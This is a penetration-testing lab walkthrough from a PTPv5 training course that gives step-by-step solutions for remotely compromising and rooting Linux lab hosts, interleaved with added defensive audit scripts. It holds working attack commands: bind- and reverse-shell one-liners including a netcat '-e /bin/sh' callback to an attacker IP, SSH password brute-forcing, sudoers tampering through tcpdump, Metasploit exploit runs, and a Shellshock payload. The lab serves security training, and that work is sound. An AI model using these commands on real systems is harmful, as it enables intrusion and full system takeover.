
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation & Post-Exploitation)

Your quest for root continues as you enter the remote exploitation and post-exploitation
phases of the Penetration Testing engagement for Robots To Go, Inc. During this phase, you
uncover multiple points of entry into the target organization's network and are able to
maintain an even stronger foothold.

Target Organization: Robots To Go, Inc.

Scope: The scope is limited to the following domain and netblock:

1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain

Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems.

• Identify Vulnerabilities from a Remote Exploitation perspective.
• Exploit Discovered Vulnerabilities or misconfigurations.
• Obtain access to systems as a low-privileged user, and elevate privileges to root.

Tools:

• Metasploit
• Nmap
• Bash Shell
• Netcat

The system at 172.16.80.27 contains an unauthenticated backdoor. Locate the backdoor
and obtain access to the system. Once access has been obtained through this backdoor,
document your current user and elevate your privileges to root using local enumeration
techniques. Write your findings below.

On which port was the backdoor discovered, what user is the backdoor running
under, and what method was used to obtain root-level access as that user?

Backdoor Port on 172.16.80.27 | Backdoor is running as which user? | Method used to Elevate to Root

Of the users discovered via SMB enumeration, obtain access to 172.16.80.27 via SSH
using one of them. Once access has been obtained with that user account, elevate
privileges to root. Write your findings below.

User Account used to obtain access via SSH on 172.16.80.27 | User's Password | Method Used To Elevate Privileges

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 3
& Post-Exploitation)
Of the available SMB shares discovered during the enumeration of 172.16.80.27, one
of them can be exploited to obtain access to the server. Exploit this finding to obtain
access to 172.16.80.27 and describe your method below:

Samba Share Of Interest | Method used to obtain access to the system via the share | Obtained access as which user?

172.16.80.22 contains a remotely exploitable RMI Registry vulnerability. Exploit the
vulnerability, and once access has been obtained as a low privileged user, identify a
vulnerability in the kernel. Exploit the kernel vulnerability and obtain root access.

Obtained access initially as which user? | Kernel Vulnerability exploited to obtain root access

172.16.80.22 contains several remotely exploitable vulnerabilities within its Samba
server. Exploit the server to obtain access to the file system to conduct additional
enumeration.

Vulnerability Exploited | Level of Access obtained

172.16.80.22 contains a remotely exploitable vulnerability on a web server port.
Exploit the vulnerability and obtain access as the web server user via a shell. Use this
access to elevate your privileges to root.

Vulnerability Exploited | Vulnerable File | Method used to Elevate to Root

Below, you can find solutions for each of the Remote Exploitation and Post-Exploitation
tasks. Remember, though, that you can follow your own strategy (which may differ from the
one explained in the following lab). Additionally, the labs contain additional
vulnerabilities not covered below, which can also be exploited but may not necessarily be
required to complete the tasks. Exploit as many of the vulnerabilities as you find!

Using Nmap during our enumeration phase and while conducting a SYN scan for all 65535
ports, we should have discovered a port listening on 60666 on 172.16.80.27:

# nmap -sS 172.16.80.27 -p1-65535

Using netcat (nc), when connecting to the 60666 port, we notice that the system is opening
up another port (60667). While leaving that connection open, in another terminal, we netcat
the newly opened 60667 port and find we are connected to a bind shell, and can execute
commands as a user “Jordan”:

# nc 172.16.80.27 60666    (in one terminal)
# nc 172.16.80.27 60667    (in the second terminal)

We can then upgrade our shell using a python shell upgrade one-liner:

$ python -c 'import pty; pty.spawn("/bin/bash")'

Now, after conducting some simple enumeration, we find that "Jordan" has the ability to run
the nano editor as root via sudo on a certain file (readme.txt) matching /home/*/*/readme.txt:

$ sudo -l

Seeing as the sudo rule only requires that a file called "readme.txt" exist in a
subdirectory of Jordan's home directory, we can create the subdirectory, but instead of
creating a regular "readme.txt" file, we'll create a symbolic link named "readme.txt" pointing
to the /etc/shadow file:

$ cd /home/jordan && mkdir foo && cd foo
$ ln -s /etc/shadow readme.txt

Listing the directory shows we've created a symbolic link to the /etc/shadow file, named
"readme.txt":

Once this is done, we can sudo the nano program to read the readme.txt file, which should
display the /etc/shadow file, but we notice that a proper terminal hasn't been set in the
user's TERM environment variable:

We first need to add an environment variable for “TERM” to use xterm with the following
command:

$ export TERM=xterm

Once we’ve defined the TERM environment variable, we can then read the readme.txt file
(which is a symbolic link to the privileged /etc/shadow file):

$ sudo /bin/nano /home/jordan/foo/readme.txt

In addition to the above explanation, the above Nano Wildcard Directory Symlink
vulnerability can be exploited in multiple ways to gain root to the system. Use your
imagination and see what other ways you can exploit it for a root shell!

During enumeration phases, and using enum4linux against 172.16.80.27, we should have
obtained a user list:

# enum4linux -a 172.16.80.27

Of the users discovered, we find that we can execute a dictionary attack using the first 500
entries of the rockyou.txt wordlist and are able to crack the password for the “james” user.

Create a password list of 500 entries from the rockyou.txt wordlist file, and save it to another
file:

# head -n 500 /usr/share/wordlists/rockyou.txt > top-500.txt

Execute a hydra attack against the SSH port on 172.16.80.27 for the james user (or all of the
users discovered); when complete, you should be able to crack the password for james on
the 172.16.80.27 machine:

# hydra -l james -P top-500.txt ssh://172.16.80.27

Using the password, we SSH to 172.16.80.27 as james, and after conducting some local
enumeration, find that james can sudo the “/usr/sbin/tcpdump” command. James’ sudo
entry is provided to us once we issue the “sudo -l” command, and enter his password, which
we previously obtained via the SSH dictionary attack:

Some basic research on using "tcpdump" to elevate our privileges when it is defined as a
sudo entry for a user reveals that we can take the following steps to obtain root (tcpdump
allows for execution of arbitrary commands with a specially constructed command line, via
its -z post-rotate command option):

1. Write a file to /tmp, in this case, we’ll call the file “elevate,” with the following
contents:

#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers

We can use the cat command to redirect our contents to the /tmp/elevate file like so:

$ cat > /tmp/elevate
#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
^D (PRESS CTRL-D TO SEND END-OF-FILE AND WRITE THE FILE)

2. We then set the executable bit for our /tmp/elevate file:

$ chmod +x /tmp/elevate

3. We can then run the following sudo command for tcpdump:

$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

The above tcpdump command, as sudo (root), along with our “elevate” file, will write a new
entry to the /etc/sudoers file for james, whose shell can then be immediately upgraded to
root with a “sudo bash” command:

$ sudo bash
# id
uid=0(root) gid=0(root) groups=0(root)
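As an added defensive check that is not part of the Caendra lab material: a small sudoers audit that flags the two rule patterns abused in the tasks above, Jordan's wildcard nano rule and James' tcpdump rule. The sample rules and the list of shell-escape binaries are constructed for this example.

```python
"""Audit sudoers-format rules for the two weaknesses exploited in this lab: a
wildcard in a command argument (nano /home/*/*/readme.txt, satisfiable with a
symlink) and a binary that runs arbitrary commands when permitted as root
(tcpdump -z). The sample rules are constructed, not the lab's sudoers file."""
import re
import shlex

# Binaries that yield command execution or a shell when run as root via sudo.
# Assumption: a starting list for this audit; extend it for your own estate.
SHELL_ESCAPE_BINARIES = {"nano", "vi", "vim", "less", "more", "man", "find", "awk",
                         "perl", "python", "tcpdump", "nmap", "bash", "sh", "env", "tar"}

# user host=(runas) TAG: command [args][, command ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_rule(line):
    """Return (severity, message) findings for one sudoers rule line."""
    findings = []
    line = line.strip()
    m = RULE_RE.match(line)
    if not line or line.startswith(("#", "Defaults")) or not m:
        return findings
    user = m.group("user")
    how = " without a password" if "NOPASSWD" in m.group("tags") else ""
    for cmd in m.group("cmds").split(","):
        cmd = cmd.strip()
        if cmd == "ALL":
            findings.append(("high", f"{user}: may run ALL commands as root{how}"))
            continue
        parts = shlex.split(cmd)
        if not parts:
            continue
        binary, args = parts[0].rsplit("/", 1)[-1], parts[1:]
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append(("high", f"{user}: {binary} as root{how} can spawn "
                             "arbitrary commands or a shell"))
        if any("*" in a for a in args):
            findings.append(("high", f"{user}: wildcard in '{' '.join(args)}' lets the "
                             "user choose the file (symlinks included)"))
    return findings

def audit_sudoers(text):
    """Audit every rule in a sudoers-format string."""
    findings = []
    for line in text.splitlines():
        findings.extend(audit_rule(line))
    return findings

SAMPLE_SUDOERS = """\
# constructed sample modelled on the two rules found in this lab
jordan ALL=(root) NOPASSWD: /bin/nano /home/*/*/readme.txt
james ALL=(root) /usr/sbin/tcpdump
alice ALL=(root) NOPASSWD: /usr/bin/systemctl status nginx
bob ALL=(ALL) ALL
"""
```

Running `audit_sudoers(SAMPLE_SUDOERS)` reports both of Jordan's problems, James' tcpdump entry and bob's blanket rule, while alice's fixed-argument rule passes.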

During enumeration of the Samba server on IP address 172.16.80.27, we should have
uncovered an available share called "web", which we also find is configured with "READ" and
"WRITE" permissions:

# smbmap -H 172.16.80.27

We also find that anonymous access is allowed to the share using Nmap with the
"smb-enum-shares" script:

# nmap --script smb-enum-shares 172.16.80.27

Having this information, we use smbclient to connect to the share while providing no
password and a blank user (anonymous access), and list the share's contents:

# smbclient -N \\\\172.16.80.27\\web -U ""
smb: \> ls
  info.pl                              A      283  Sat Jan 20 01:46:57 2018

We upload a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl, available
on Kali) to the server after modifying it with the attacker IP and port we will use for a
netcat listener:

Upload the perl-reverse-shell.pl file to the “web” share using smbclient:

smb: \> put perl-reverse-shell.pl

In another terminal, we set up a netcat listener on port 1234:

# nc -nlvp 1234

We then browse to the perl-reverse-shell.pl on "172.16.80.27" and receive a reverse shell as
the www-data user:

During enumeration of the systems for vulnerabilities, and having conducted a port scan for
all ports, we find that "172.16.80.22" contains an RMI Registry service listening on the
non-standard port 1999. Researching the RMI Registry version found shows that it is
vulnerable to arbitrary loading of Java classes.

We use metasploit’s “java_rmi_server” exploit module against the “172.16.80.22” system:

msf > use exploit/multi/misc/java_rmi_server
msf > set RHOST 172.16.80.22
msf > set RPORT 1999    (CHANGE THIS TO THE NON-STANDARD PORT DISCOVERED FOR THE RMI SERVICE)
msf > set SRVHOST 172.16.80.5    (TESTER IP)
msf > exploit

We now have a meterpreter session opened up on 172.16.80.22 as user “todd”:

msf exploit(multi/misc/java_rmi_server) > sessions

We can then interact with the session, and launch a shell:

msf > sessions -i 1

We can then, once again, use the python tty spawn one-liner to get a proper shell on the
system and check our current kernel version with the "uname -a" command:

$ python -c 'import pty; pty.spawn("/bin/bash")'

Our kernel version shows that the system is running an older kernel, version "2.6.24-16."
We check exploit-db for vulnerabilities related to kernel version 2.6, and find that it is
potentially vulnerable to a "udev" exploit, among others:

https://www.exploit-db.com/exploits/21848/

There is a Metasploit module available for this particular kernel exploit, so let’s load that
exploit and set it up for our current meterpreter session:

First, we send our current session into the background with “Ctrl-Z,” then type “background”:

We then search for the udev exploit, and load the available exploit module:

msf > search udev

msf > use exploit/linux/local/udev_netlink

We then set our SESSION value to the current meterpreter session and set our LHOST:

msf > set SESSION 1
msf > set LHOST 172.16.80.5

And run the exploit:

msf > exploit

Note: Experiment with different payloads.

During post-exploitation of the machine "172.16.80.22", once we had gotten access as the
user "todd" (and root via the udev kernel exploit), we should have determined the version of
Samba on the system with the following command, to check for an exploitable Samba version:

$ smbd --version

This should give us the following output:

Version 3.0.20-Debian

After conducting additional enumeration as user "todd" of the Samba configuration in the file
"/etc/samba/smb.conf," we find that it is configured with an option that allows reading of
the root file system via a Symlink Directory Traversal vulnerability, specifically the "wide
links = yes" option.

Knowing this information, we can use the Metasploit module "samba_symlink_traversal" and
see whether we can read the root file system once we run the module:

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf > set RHOST 172.16.80.22
msf > set SMBSHARE tmp    (THIS REQUIRES A WRITEABLE SHARE, WHICH WE DISCOVERED THROUGH ENUMERATION OF THIS HOST)
msf > exploit

We can now use smbclient to connect to the "tmp" share, and change into the "rootfs"
directory:

# smbclient -N \\\\172.16.80.22\\tmp -U ""
smb: \> cd rootfs
smb: \rootfs\> ls

From here, it is trivial to read the root file system, and download files that we may want to
conduct additional post-exploitation information gathering on:

smb: \rootfs\> cd etc
smb: \rootfs\etc\> get passwd
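As an added example that is not part of the lab material: an smb.conf audit that flags both Samba weaknesses used in these tasks, the anonymously writable "web" share found on 172.16.80.27 and the "wide links = yes" setting found on 172.16.80.22. The configuration it reads is constructed for the example.

```python
"""Audit an smb.conf for the two Samba weaknesses described in this lab:
'wide links = yes' with unix extensions left on (symlink directory traversal
out of a writable share) and anonymously writable shares such as 'web'.
The configuration below is constructed, not the lab hosts' actual smb.conf."""
import configparser

TRUE_VALUES = {"yes", "true", "1"}

def is_true(value, default=False):
    # Samba booleans; None means the option is absent, so apply its default.
    if value is None:
        return default
    return value.strip().lower() in TRUE_VALUES

def share_is_writable(section):
    # 'writable', 'writeable' and 'write ok' are inverses of 'read only' (default yes).
    for key in ("writable", "writeable", "write ok"):
        if key in section:
            return is_true(section[key])
    return not is_true(section.get("read only"), default=True)

def audit_smb_conf(text):
    """Return a list of finding strings for an smb.conf given as text."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, inline_comment_prefixes=(";", "#"))
    cp.read_string(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    # Symlinks escape the share only when both options are on; unix extensions defaults to yes.
    if is_true(g.get("wide links")) and is_true(g.get("unix extensions"), default=True):
        findings.append("global: wide links = yes with unix extensions on; a client "
                        "with write access can create a symlink that escapes the share")
    for name in cp.sections():
        if name == "global":
            continue
        s = cp[name]
        if (is_true(s.get("guest ok")) or is_true(s.get("public"))) and share_is_writable(s):
            findings.append(f"[{name}]: anonymous (guest) write access to {s.get('path', '?')}")
    return findings

SAMPLE_SMB_CONF = """\
; constructed sample modelled on the lab hosts, not a real configuration
[global]
wide links = yes
[web]
path = /var/www/html
guest ok = yes
writable = yes
[tmp]
path = /tmp
public = yes
read only = no
[secure]
writable = yes
"""
```

The `[secure]` share is writable but not guest-accessible, so only the global setting and the two anonymous shares are reported.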

During information gathering we determine that the system at IP address 172.16.80.22 is
running a web server on TCP port 80:

We use "dirsearch" to conduct a dictionary brute force attack for any potential
directories/files on the server with the "-r" (recursive) option and the "-f" option to force
file extensions; specifically, we'll search for any CGI files in this case:

# ./dirsearch.py -u http://172.16.80.22/ -e cgi -r -f

The scan quickly uncovers the existence of a “calendar.cgi” program in the “cgi-bin”
directory:

Knowing that CGI programs, in particular, are of primary concern in regards to shellshock
vulnerabilities, we use Metasploit’s “apache_mod_cgi_bash_env” module to check for
exploitability, making sure to configure the correct options, including the TARGETURI value:

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf > set RHOSTS 172.16.80.22
msf > set TARGETURI cgi-bin/calendar.cgi
msf > exploit

The server returns the output of the “id” command, which confirms that the exploit (with its
default CMD value of “id”) was successful:

We exploit this, to obtain a reverse shell as the “www-data” user by modifying the “CMD”
value in the Metasploit module to execute a netcat reverse shell back to our attacker system
where we have a netcat listener running.

First, modify the CMD variable to launch a netcat reverse shell:

msf > set CMD "/bin/nc <attacker_IP> 1234 -e /bin/sh"

Now we make sure we have a netcat listener running on our attacker machine:

# nc -nlvp 1234

We then run the shellshock exploit module and should receive a reverse shell back to our
attacker system, and we can see we are the “www-data” user at this point by running the “id”
command to confirm:

msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
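From the detection side, as an added example that is not part of the lab material: a check over Apache combined-format access log lines for the Shellshock function-definition prefix that the scanner module above places in a request header. The log lines are constructed for the example.

```python
"""Flag Shellshock probes against CGI scripts in Apache combined-format access
logs. The bash function-definition prefix '() {' that the scanner module sends
in a request header is logged when it arrives in User-Agent or Referer.
The log lines are constructed for this example, not taken from the lab host."""
import re

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# '() {' possibly with odd spacing, e.g. '() { :;};' or '(){ :; };'
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
HEADER_NAME = {"ua": "User-Agent", "referer": "Referer"}

def detect_shellshock(lines):
    """Return one hit dict per log line whose logged headers carry the prefix."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": m.group("path"),
                    "status": int(m.group("status")),
                    "header": HEADER_NAME[field],
                    "payload": m.group(field),
                    # CGI scripts are the usual exposure point, as on this host
                    "cgi_target": m.group("path").startswith("/cgi-bin/"),
                })
                break  # one hit per line even if both headers carry it
    return hits

SAMPLE_LOG = [
    # constructed: the 'id' probe the module sends by default, in User-Agent
    '172.16.80.5 - - [20/Jan/2018:02:10:11 +0000] "GET /cgi-bin/calendar.cgi HTTP/1.1" '
    '200 512 "-" "() { :;}; echo; /usr/bin/id"',
    # constructed: the same probe carried in Referer, browser-like User-Agent
    '172.16.80.5 - - [20/Jan/2018:02:10:15 +0000] "GET /cgi-bin/calendar.cgi HTTP/1.1" '
    '200 512 "() { :;}; echo; /usr/bin/id" "Mozilla/5.0"',
    # constructed: benign traffic, parentheses but no function definition
    '172.16.80.9 - - [20/Jan/2018:02:11:00 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '172.16.80.9 - - [20/Jan/2018:02:11:30 +0000] "GET /cgi-bin/calendar.cgi?month=1 '
    'HTTP/1.1" 200 640 "-" "curl/7.52.1"',
]
```

A 200 response to such a request, as the module reports when its default "id" command returns output, is the indicator that the CGI handler actually executed the header.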

We upgrade our shell with python, as we have done previously with other tasks:

$ python -c 'import pty; pty.spawn("/bin/sh")'

We can then conduct some post-exploitation enumeration and find a way to obtain root
privileges. We do so, and find that “nmap” is configured as a SUID root executable, and
furthermore, we determine that it allows the “--interactive” mode which as we know, can
give us a root shell if nmap is SUID root:

$ find / -perm -4000 2>/dev/null

We run nmap with “--interactive” mode switch to escape to a shell, and escalate our
privileges to that of Effective User ID (EUID) “root”:

sh-3.2$ nmap --interactive
nmap> !sh

Once again, we are root!
